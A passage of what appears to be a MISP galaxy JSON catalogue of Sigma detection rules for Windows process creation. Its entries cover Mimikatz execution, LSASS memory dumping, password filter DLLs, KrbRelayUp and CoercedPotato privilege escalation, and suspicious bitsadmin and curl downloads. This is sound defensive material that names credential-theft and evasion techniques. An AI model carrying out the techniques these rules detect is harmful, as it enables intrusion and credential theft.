Typically this is easy to spot and add to whitelist", "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], "filename": "proc_creation_win_renamed_binary_highly_relevant.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", "https://twitter.com/christophetd/status/1164506034720952320", "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003", "car.2013-05-009" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "value": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries" }, { "description": "Detects the removal or uninstallation of an application via \"Wmic.EXE\".", "meta": { "author": "frack113", "creation_date": "2022-01-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_uninstall_application.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_application.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": 
"01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", "value": "Application Removed Via Wmic.EXE" }, { "description": "Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.\nThis could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.\n", "meta": { "author": "Sreeman", "creation_date": "2021-06-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "value": "Write Protect For Storage Disabled" }, { "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-04-06", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_public_folder.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.mandiant.com/resources/evolution-of-fin7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": 
"970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", "value": "Execution of Powershell Script in Public Folder" }, { "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-29", "falsepositive": [ "Legitimate usage of the features listed in the rule." ], "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", "value": "Potential Suspicious Windows Feature Enabled - ProcCreation" }, { "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", 
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", "value": "File With Suspicious Extension Downloaded Via Bitsadmin" }, { "description": "Detects the execution of a renamed \"CURL.exe\" binary based on the PE metadata fields", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-09-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_curl.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Kostastsale/status/1700965142828290260", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_curl.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7530cd3d-7671-43e3-b209-976966f6ea48", "value": "Renamed CURL.EXE Execution" }, { "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image based detection", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-06", "falsepositive": [ "Software Installers" ], "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/jonasLyk/status/1555914501802921984", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "value": "Use NTFS Short Name in Image" }, { "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-01-29", "falsepositive": [ "Administrative script libraries" ], "filename": "proc_creation_win_powershell_frombase64string.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" ], "tags": [ "attack.t1027", "attack.defense-evasion", "attack.t1140", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" }, { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", "value": "Base64 Encoded PowerShell Command Detected" }, { "description": "Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.\nAttackers might abuse this in order to bypass application whitelisting.\n", "meta": { "author": "Beyu Denis, oscd.community", "creation_date": "2019-10-26", "falsepositive": [ "Legitimate use of dnx.exe by legitimate user" ], "filename": "proc_creation_win_dnx_execute_csharp_code.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnx_execute_csharp_code.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1027.004" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", "value": "Potential Application Whitelisting Bypass via Dnx.EXE" }, { "description": "Detects well-known mimikatz command line arguments", "meta": { "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "creation_date": "2019-10-22", "falsepositive": [ "Unlikely" ], "filename": 
"proc_creation_win_hktl_mimikatz_command_line.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://tools.thehacker.recipes/mimikatz/modules", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.t1003.002", "attack.t1003.004", "attack.t1003.005", "attack.t1003.006" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "value": "HackTool - Mimikatz Execution" }, { "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-14", "falsepositive": [ "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. 
The PID/Process Name of the process being dumped needs to be investigated" ], "filename": "proc_creation_win_dotnetdump_memory_dump.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/1635288066909966338", "https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnetdump_memory_dump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", "value": "Process Memory Dump Via Dotnet-Dump" }, { "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_type_arbitrary_file_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_type_arbitrary_file_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "value": "Potential Download/Upload Activity Using Type Command" }, { "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced", 
"meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-26", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_krbrelayup.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Dec0ne/KrbRelayUp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_krbrelayup.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003", "attack.lateral-movement", "attack.t1550.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", "value": "HackTool - KrbRelayUp Execution" }, { "description": "Detects the stopping of a Windows service via the \"sc.exe\" utility", "meta": { "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-05", "falsepositive": [ "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. 
Filter legitimate activity accordingly" ], "filename": "proc_creation_win_sc_stop_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", "value": "Stop Windows Service Via Sc.EXE" }, { "description": "Detects the execution of the \"msxsl\" binary with an \"http\" keyword in the command line. This might indicate a potential remote execution of XSL files.", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-11-09", "falsepositive": [ "Msxsl is not installed by default and is deprecated, so unlikely on most systems." 
], "filename": "proc_creation_win_msxsl_remote_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msxsl_remote_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1220" ] }, "related": [ { "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75d0a94e-6252-448d-a7be-d953dff527bb", "value": "Remote XSL Execution Via Msxsl.EXE" }, { "description": "Detects execution of \"WerFault.exe\" with the \"-pr\" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_werfault_reflect_debugger_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html", "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd", "value": "Potential ReflectDebugger Content Execution Via WerFault.EXE" }, { "description": 
"Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.", "meta": { "author": "Bhabesh Raj", "creation_date": "2022-08-01", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "value": "Potential Mpclient.DLL Sideloading Via Defender Binaries" }, { "description": "Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). 
This could be a sign of abuse to proxy execution through a signed binary.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-05", "falsepositive": [ "Legitimate usage for debugging purposes" ], "filename": "proc_creation_win_susp_electron_execution_proxy.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/", "https://positive.security/blog/ms-officecmd-rce", "https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc", "https://lolbas-project.github.io/lolbas/Binaries/Msedge/", "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf", "https://lolbas-project.github.io/lolbas/Binaries/Teams/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml" ], "tags": [ "attack.execution" ] }, "uuid": "378a05d8-963c-46c9-bcce-13c7657eac99", "value": "Potentially Suspicious Electron Application CommandLine" }, { "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. 
This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", "meta": { "author": "Janantha Marasinghe", "creation_date": "2020-09-26", "falsepositive": [ "This may have false positives on hosts where Virtualbox is legitimately being used for operations" ], "filename": "proc_creation_win_virtualbox_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.006", "attack.t1564" ] }, "related": [ { "dest-uuid": "b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bab049ca-7471-4828-9024-38279a4c04da", "value": "Detect Virtualbox Driver Installation OR Starting Of VMs" }, { "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". 
"This script can be used to gather information about the target machine", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_gather_network_info_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gather_network_info_execution.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1615", "attack.t1059.005" ] }, "related": [ { "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07aa184a-870d-413d-893a-157f317f6f58", "value": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS" }, { "description": "Detects the use of CoercedPotato, a tool for privilege escalation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-10-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_coercedpotato.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.hackvens.fr/articles/CoercedPotato.html", "https://github.com/hackvens/CoercedPotato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_coercedpotato.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e8d34729-86a4-4140-adfd-0a29c2106307", "value": "HackTool - CoercedPotato Execution" }, { "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", "meta": { "author": "Sreeman", "creation_date": "2020-10-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml" ], "tags": [ "attack.credential-access", "attack.t1556.002" ] }, "related": [ { "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", "value": "Dropping Of Password Filter DLL" }, { "description": "Detects usage of Dsacls to grant over permissive permissions", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate administrators granting over permissive permissions to users" ], "filename": "proc_creation_win_dsacls_abuse_permissions.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/dsacls.html", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { 
"dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", "value": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE" }, { "description": "Detects the use of \"Ilasm.EXE\" in order to compile C# intermediate (IL) code to EXE or DLL.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ilasm_il_code_compilation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.echotrail.io/insights/search/ilasm.exe", "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ilasm_il_code_compilation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", "value": "C# IL Code Compilation Via Ilasm.EXE" }, { "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_whoami_groups_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_groups_discovery.yml" ], "tags": [ 
"attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "value": "Group Membership Reconnaissance Via Whoami.EXE" }, { "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", "meta": { "author": "frack113", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b046706-5789-4673-b111-66f25fe99534", "value": "Deleted Data Overwritten Via Cipher.EXE" }, { "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-07-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_susp_download.yml", "level": "high", 
